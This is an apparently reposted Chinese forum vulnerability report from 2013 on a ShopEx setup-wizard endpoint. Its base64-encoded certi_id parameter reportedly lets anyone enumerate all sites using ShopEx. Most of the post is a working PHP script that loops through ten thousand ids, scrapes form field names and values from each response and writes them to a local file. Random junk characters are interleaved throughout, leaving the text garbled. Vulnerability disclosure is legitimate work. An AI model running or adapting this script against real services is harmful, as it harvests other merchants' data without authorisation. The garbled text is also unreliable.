|
|
简要描述:) R- \! Z; |5 y5 O! [! f4 f2 ]! Q
ShopEx某接口缺陷,可遍历所有网站; ]$ |6 Q% D4 _, D0 Q+ `
详细说明:& e F, K: K3 k, C/ H
问题出现在shopex 网店使用向导页面 ( ~% l, ]6 {: G! J2 q9 K% J9 N
0 i% {/ A( s. n5 f, o, f Q
) e, }1 e0 @9 H9 P1 l! \/ c1 k. m# b1 e5 G4 B& q7 w( s8 x
http://guide.ecos.shopex.cn/step ... WlkaWFuLmNvbVwvIn0=
: t! N8 A- x) M0 W5 V
% n0 U3 b5 E# M7 e# _0 g" q6 h1 d1 _0 _% n4 _. a2 y1 a2 l
* r3 C( Y7 M7 G7 H
refer base64解密为 {"certi_id":'1051',"callback_url":"http:\/\/www.joyogame.net\/"}8 d$ ]; |, g; v7 Y: a% z1 v) v
1 m$ q; I: z! }! J" o: A. V4 T% D- N
- R# p) B( e3 R2 E1 Q6 ~' U4 q/ d% H4 V# T7 h
我们修改certi_id 即可遍历所有使用了ShopEx程序的网站
* s1 N2 U' n" q' [
' w" W' w- S) B5 H! W/ u
, o# G. C* L" z9 J" e: k
. _- l* \% }0 n7 ?% `( [/ T<?php
' [3 c T$ o" [) } f }7 k$ d
9 K& g! o' r4 X" a x, k2 ? for ($i=1; $i < 10000; $i++) { //遍历
9 h7 b" H8 M& \0 j: z- S7 ] G ]; y% i: ?7 \% r; N2 \1 g. T
ShowshopExD($i);% ^/ B, K4 N$ L+ i a
3 }. l$ R8 D# e# N6 _! L
}
r: q" e% ?4 X) r2 c. g& F2 x: ~6 \6 o+ w; ?. H1 i5 h
function ShowshopExD($cid) {
; i5 T9 \ E1 X; F+ U, E! ~: o2 ?4 K A3 K8 |8 T2 N1 ?
$url='http://guide.ecos.shopex.cn/step2.php';1 P. l: j. Y }! J( I
" k. }" \- y9 |/ V) O
$refer = base64_encode('{"certi_id":'.intval($cid).',"callback_url":"http:\/\/www.a.com\/"}');
( O/ [6 f! D# _. o2 f3 h* c8 k$ @7 C
$url = $url.'?refer='.$refer;! B8 S+ c0 s6 S# q
; u$ ^' F: `! O. a
$ch = curl_init($url);
' c5 h9 L/ x/ s4 ~1 ^ S- X/ d% q% M% {% R0 Q, B5 Z. q, Q- ~
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true) ;
1 l V h9 {5 l0 l2 F6 F2 f* ~. D9 u! G0 x- N: N: E
curl_setopt($ch, CURLOPT_BINARYTRANSFER, true) ;
- ~6 X/ T5 V6 }' W: _* k* b2 A6 U1 v( Q: O' l+ j5 d
$result = curl_exec($ch);4 o/ e* A2 x0 d+ f$ [# A" }% U6 |
5 R! h8 x2 J' C9 [% Q
$result = mb_convert_encoding($result, "gb2312", "UTF-8");
4 l" m% e! R0 ?. G% r7 p# r* M# f8 v) h& |3 a5 [
if(strpos($result,$refer))1 E# j# V, l5 G& K" l9 `5 R* D
/ I' h0 B& E! e$ Z3 `) H8 R7 L
{) p/ c8 |0 Y& p9 D* A: B
7 b# [9 r- S8 E' u $fp = fopen("c:/shopEx.txt",'ab'); //保存文件" p0 }/ @$ ?/ L( p3 J: o' d
$ `, Z, ?0 z& z* E preg_match_all('/<input\stype="text"(.*?)\/>/',$result,$value);
1 U# F. _/ J4 W- u5 Y7 |# V7 h7 n: P2 L( S
foreach ($value[1] as $key) {
' x. ]8 w1 V& a+ @' t) v0 t9 D5 ~$ w) M3 j
preg_match_all('/name="(.*?)"(.*?)value="(.*?)"/',trim($key),$res);. z' L3 p5 T5 X9 ~" c
9 s- ~$ n. F! [ echo $res[1][0].':'.$res[3][0]."\r\n";7 m9 U1 C. W/ _* V
4 o! `+ S# }0 a' g v
$col =$res[1][0].':'.$res[3][0]."\r\n"; 6 Z) y" @: S4 | h' L! h- d/ ?
! `* o/ T! h; x0 A/ L3 | fwrite($fp, $col, strlen($col));
: m% _* W. y! K2 l# ]6 @/ w% m# p0 z Z% L$ q
}
g+ g! h! ?; j' I
/ h% f& p/ V* Y5 k5 s echo '--------------------------------'."\r\n";
- H# W5 p, z: l7 R4 T& V- [! g6 o ~
fclose($fp);
5 t* h- C( ~+ K. F( c+ A! o
4 o4 Z! e' v9 G2 W) _" |& M" H0 Z2 Q }
/ J+ M6 o& Z" D' V7 X* _& O' c* C
flush();
3 p; u. U: J& t( N j: W9 h+ R0 U" ]* V* e4 R7 G( n
curl_close($ch);* E( p3 _8 N$ Q+ n. I* I
. V5 F" \( a; n4 _0 A- i8 E( A
}1 q T, ~/ v+ R' s8 c! d- h) y
: x* S# K( g. J6 G1 s( u `: S5 B3 c
?>
" i1 h! O# F( N* l! c漏洞证明: [ v+ l5 W& v# u$ D- Y5 j1 `" g
http://www.myhack58.com/Article/UploadPic/2013-9/201392110502740490.jpg! W V* k+ u# c5 S& e% }# O5 R
refer换成其他加密方式
. \) d7 Q8 u' b! b) j6 D$ b' x |
|
发表于 2013-9-21 15:59:47
收藏
支持
反对